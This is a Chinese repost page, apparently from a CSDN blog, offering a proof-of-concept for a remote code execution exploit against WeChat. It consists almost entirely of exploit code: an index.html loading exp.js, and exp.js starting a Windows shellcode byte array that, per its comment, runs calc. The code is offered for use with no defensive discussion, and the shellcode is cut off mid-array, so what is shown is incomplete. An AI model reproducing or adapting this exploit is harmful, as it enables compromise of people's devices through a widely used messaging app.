其他分享
首页 > 其他分享> > 微信远程代码执行漏洞-亲测已上线

微信远程代码执行漏洞-亲测已上线

作者:互联网

目录

POC:

index.html

exp.js


POC:

index.html

<script src="exp.js"></script>

exp.js

ENABLE_LOG = true;
IN_WORKER = true;

// run calc and hang in a loop
var shellcode = [,0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0

标签:0x3c,0x8b,微信,0x00,0x01,0x52,0x31,代码执行,亲测
来源: https://blog.csdn.net/wuguojiuai/article/details/115801503